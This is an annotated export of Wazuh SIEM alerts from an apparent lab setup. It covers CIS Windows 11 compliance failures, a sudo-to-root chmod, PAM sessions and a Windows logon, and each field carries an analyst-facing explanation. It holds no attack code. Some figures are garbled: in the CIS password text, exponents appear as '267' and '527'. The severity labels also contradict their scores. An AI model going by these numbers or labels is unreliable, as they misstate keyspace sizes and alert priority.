Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534684.2375277
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26164
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit MPSSVC Rule-Level Policy Change' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory determines whether the operating system generates audit events when changes are made to policy rules for the Microsoft Protection Service (MPSSVC.exe). Events for this subcategory include: - 4944: The following policy was active when the Windows Firewall started. - 4945: A rule was listed when the Windows Firewall started. - 4946: A change has been made to Windows Firewall exception list. A rule was added. - 4947: A change has been made to Windows Firewall exception list. A rule was modified. - 4948: A change has been made to Windows Firewall exception list. A rule was deleted. - 4949: Windows Firewall settings were restored to the default values. - 4950: A Windows Firewall setting has changed. - 4951: A rule has been ignored because its major version number was not recognized by Windows Firewall. - 4952: Parts of a rule have been ignored because its minor version number was not recognized by Windows Firewall. The other parts of the rule will be enforced. - 4953: A rule has been ignored by Windows Firewall because it could not parse the rule. - 4954: Windows Firewall Group Policy settings have changed. The new settings have been applied. - 4956: Windows Firewall has changed the active profile. - 4957: Windows Firewall did not apply the following rule. - 4958: Windows Firewall did not apply the following rule because the rule referred to items not configured on this computer. The recommended state for this setting is : Success and Failure
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Changes to firewall rules are important for understanding the security state of the computer and how well it is protected against network attacks.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit MPSSVC Rule-Level Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"MPSSVC Rule-Level Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

data.sca.check.previous_result:  not applicable
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)

🧠 What happened? SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:54.761+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:54.761+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  SCA summary: CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Score less than 50% (32)
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19004
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534694.2380503
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  summary
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.description:  This document provides prescriptive guidance for establishing a secure configuration posture for Microsoft Windows 11.
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.policy_id:  cis_win11_enterprise_21H2
Internal numeric ID for that policy.

data.sca.passed:  126
Checks that were green – a quick confidence boost.

data.sca.failed:  260
Number of failed checks in the scan. Lots of red means poor hygiene.

data.sca.invalid:  9
Checks that couldn’t run (permissions, missing file, etc.).

data.sca.total_checks:  395
Total tests executed this run.

data.sca.score:  32
Overall compliance score 0‑100%. Under 85% usually needs remediation.

data.sca.file:  cis_win11_enterprise.yml
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:44:54.894+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:44:54.894+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Password must meet complexity requirements' is set to 'Enabled'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['1.1.5']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['5.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534694.2381818
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26004
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Password must meet complexity requirements' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting checks all new passwords to ensure that they meet basic requirements for strong passwords. When this policy is enabled, passwords must meet the following minimum requirements: - Not contain the user's account name or parts of the user's full name that exceed two consecutive characters - Be at least six characters in length - Contain characters from three of the following categories: - English uppercase characters (A through Z) - English lowercase characters (a through z) - Base 10 digits (0 through 9) - Non-alphabetic characters (for example, !, $, #, %) o A catch-all category of any Unicode character that does not fall under the previous four categories. This fifth category can be regionally specific. Each additional character in a password increases its complexity exponentially. For instance, a seven-character, all lower-case alphabetic password would have 267 (approximately 8 x 109 or 8 billion) possible combinations. At 1,000,000 attempts per second (a capability of many password-cracking utilities), it would only take 133 minutes to crack. A seven-character alphabetic password with case sensitivity has 527 combinations. A seven-character case-sensitive alphanumeric password without punctuation has 627 combinations. An eight-character password has 268 (or 2 x 1011) possible combinations. Although this might seem to be a large number, at 1,000,000 attempts per second it would take only 59 hours to try all possible passwords. Remember, these times will significantly increase for passwords that use ALT characters and other special keyboard characters such as '!'' or '@''. Proper use of the password settings can help make it difficult to mount a brute force attack. The recommended state for this setting is: Enabled. Note: Password Policy settings (section 1.1) and Account Lockout Policy settings (section 1.2) must be applied via the Default Domain Policy GPO in order to be globally in effect on domain user accounts as their default behavior. If these settings are configured in another GPO, they will only affect local user accounts on the computers that receive the GPO. However, custom exceptions to the default password policy and account lockout policy rules for specific domain users and/or groups can be defined using Password Settings Objects (PSOs), which are completely separate from Group Policy and most easily configured using Active Directory Administrative Center.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Passwords that contain only alphanumeric characters are extremely easy to discover with several publicly available tools.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Windows Settings\Security Settings\Account Policies\Password Policy\Password must meet complexity requirements
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  1.1.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  5.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['powershell Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'powershell Get-ADDefaultDomainPasswordPolicy -Current LoggedOnUser'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Successful sudo to ROOT executed.

🧠 What happened? Successful sudo to ROOT executed.

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:45:14.601+0000 | 🧠 MITRE: ['Privilege Escalation', 'Defense Evasion'] – ['Sudo and Sudo Caching'] [T1548.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1548.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:45:14.601+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Successful sudo to ROOT executed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5402
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1548.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Privilege Escalation', 'Defense Evasion']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Sudo and Sudo Caching']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['syslog', 'sudo']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5', '10.2.2']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.6', '7.8', '7.13']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7', 'AC.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534714.2389057
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:45:13.791511+00:00 server1 sudo: simba : TTY=pts/0 ; PWD=/home/simba ; USER=root ; COMMAND=/usr/bin/chmod o+r /var/ossec/logs/alerts/alerts.json
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sudo
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:45:13.791511+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  sudo
Parent decoder used – for nested parsing.

decoder.name:  sudo
Name of the Wazuh decoder that parsed this raw log.

decoder.ftscomment:  First time user executed the sudo command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  root
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.tty:  pts/0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.pwd:  /home/simba
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.command:  /usr/bin/chmod o+r /var/ossec/logs/alerts/alerts.json
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session opened.

🧠 What happened? PAM: Login session opened.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:45:14.601+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:45:14.601+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session opened.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5501
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534714.2389646
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:45:13.795776+00:00 server1 sudo: pam_unix(sudo:session): session opened for user root(uid=0) by simba(uid=1000)
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sudo
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:45:13.795776+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.srcuser:  simba
User on the originating host – watch for root / SYSTEM used remotely.

data.dstuser:  root(uid=0)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.uid:  1000
Numeric user ID – pairs with username when name missing.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

PAM: Login session closed.

🧠 What happened? PAM: Login session closed.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:45:14.601+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:45:14.601+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  PAM: Login session closed.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  5502
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['pam', 'syslog']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.gpg13:  ['7.8', '7.9']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.14', 'AC.7']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  000
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  server1
Hostname of the source machine. Handy when matching with AD or your CMDB.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534714.2390097
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  2025-04-24T22:45:13.829022+00:00 server1 sudo: pam_unix(sudo:session): session closed for user root
The complete raw log message before parsing – last‑resort truth for deep dives.

predecoder.program_name:  sudo
Process that originally wrote the log line (e.g., sshd, sudo).

predecoder.timestamp:  2025-04-24T22:45:13.829022+00:00
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

decoder.parent:  pam
Parent decoder used – for nested parsing.

decoder.name:  pam
Name of the Wazuh decoder that parsed this raw log.

data.dstuser:  root
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  /var/log/auth.log
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:45:57.551+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:45:57.551+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  63
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534757.2390482
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:44:43.8159628Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43949
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:46:59.626+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:46:59.626+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
